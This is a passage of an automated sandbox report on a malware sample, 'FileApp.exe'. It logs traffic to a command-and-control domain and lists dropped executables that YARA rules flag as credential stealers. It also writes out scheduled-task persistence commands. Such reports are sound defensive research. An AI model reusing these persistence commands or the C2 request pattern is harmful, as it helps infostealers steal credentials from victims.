2024-09-04 15:38:24 UTC	816	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-04 15:38:24 UTC	1369	IN	Data Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
2024-09-04 15:38:24 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 6b 43 34 49 59 77 53 41 58 33 30 62 78 35 4c 5f 6e 31 5a 4c 62 5a 35 6a 34 54 73 6b 42 52 50 70 42 74 69 34 36 56 36 6c 41 42 4d 2d 31 37 32 35 34 36 34 33 30 34 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 Data Ascii: <input type="hidden" name="atok" value="kC4IYwSAX30bx5L_n1ZLbZ5j4TskBRPpBti46V6lABM-1725464304-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-09-04 15:38:24 UTC	851	IN	Data Raw: 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare<
2024-09-04 15:38:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.6	53053	172.67.146.35	443

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:38:25 UTC	353	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=kC4IYwSAX30bx5L_n1ZLbZ5j4TskBRPpBti46V6lABM-1725464304-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: condedqpwqm.shop
2024-09-04 15:38:25 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=
2024-09-04 15:38:26 UTC	810	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:38:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kpm6q0v8s1nlhbu6hk46c8m2rn; expires=Sun, 29 Dec 2024 09:25:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FCaeW4iqGwxiDRqQwoNnLiTyoiYKJg7%2BfvZs9LKDsA%2BEAClldj80hBVbD%2B5RzznXfY1L%2FIsUc7XGzPdRokgXFgwuQx8%2F%2B%2F2wn%2FlcfVq6VIWFrwa6dS%2BsWE34%2Bt79KUemQuRN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bdf110729b87cf6-EWR alt-svc: h3=":443"; ma=86400
2024-09-04 15:38:26 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-04 15:38:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:36:55
Start date:	04/09/2024
Path:	C:\Users\user\Desktop\FileApp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FileApp.exe"
Imagebase:	0x690000
File size:	9'522'176 bytes
MD5 hash:	84FB9DA5B4879A284FE19A1635D9EE39
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:36:56
Start date:	04/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x990000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe
Imagebase:	0xba0000
File size:	528'896 bytes
MD5 hash:	D8ECB462D3046A0EE172551C5D505C8E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.2594491331.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe
Imagebase:	0xbb0000
File size:	3'851'776 bytes
MD5 hash:	68EBCC4AD727C077AEB5CC60B868E304
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe
Imagebase:	0xc60000
File size:	1'776'640 bytes
MD5 hash:	8C673503632E93C08931CD68E7476E9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe
Imagebase:	0xe0000
File size:	320'512 bytes
MD5 hash:	6B19E5C100DB0812FFB7813A1503C05D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe
Imagebase:	0x610000
File size:	8'684'256 bytes
MD5 hash:	B5887A19FE50BFA32B524AAAD0A453BC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 67%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe
Imagebase:	0xf40000
File size:	290'344 bytes
MD5 hash:	6F99968CC27D2D6A07A921AB703A5D5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe
Imagebase:	0xa10000
File size:	6'535'168 bytes
MD5 hash:	0DE88C2F978A57026E58E6CA90AE5D69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000000B.00000002.2733299099.0000000001980000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000000B.00000002.2733299099.0000000001AD4000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000B.00000002.2733299099.0000000001A50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000B.00000002.2656601610.00000000018EC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe
Imagebase:	0x630000
File size:	14'748'160 bytes
MD5 hash:	EF210F3D8E05ECAFD8D41A98B5806218
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000000C.00000002.2767261547.000000000264A000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.2703817640.0000000002060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.2767261547.00000000024EC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 75%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe
Imagebase:	0x140000000
File size:	10'902'016 bytes
MD5 hash:	025EBE0A476FE1A27749E6DA0EEA724F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
Imagebase:	0x400000
File size:	1'760'552 bytes
MD5 hash:	1959CE1E98B798963F8B7D04BFB71E69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 16%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe
Imagebase:	0x60000
File size:	210'984 bytes
MD5 hash:	998F7FB6068E4377618BCDB2138BC6F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:37:23
Start date:	04/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:37:25
Start date:	04/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	11:37:25
Start date:	04/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x4b0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2991424929.0000000002818000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.2847715040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:37:25
Start date:	04/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x9e0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.3044658256.000000000108A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000016.00000002.3044658256.000000000108A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:37:25
Start date:	04/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xef0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2458059761.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:37:26
Start date:	04/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:37:26
Start date:	04/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x670000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000019.00000002.3234197718.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000019.00000002.3234197718.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:37:27
Start date:	04/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5644 -ip 5644
Imagebase:	0x80000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	11:37:28
Start date:	04/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 824
Imagebase:	0x80000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:37:28
Start date:	04/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k move Command Command.bat & Command.bat & exit
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:37:28
Start date:	04/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:37:29
Start date:	04/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	11:37:34
Start date:	04/09/2024
Path:	C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe"
Imagebase:	0x730000
File size:	8'684'256 bytes
MD5 hash:	B5887A19FE50BFA32B524AAAD0A453BC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	11:37:35
Start date:	04/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Imagebase:	0x520000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	11:37:35
Start date:	04/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	11:37:38
Start date:	04/09/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0x280000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000024.00000002.2610045392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	11:37:38
Start date:	04/09/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0x280000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000025.00000002.2651621798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	11:37:37
Start date:	04/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0x520000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
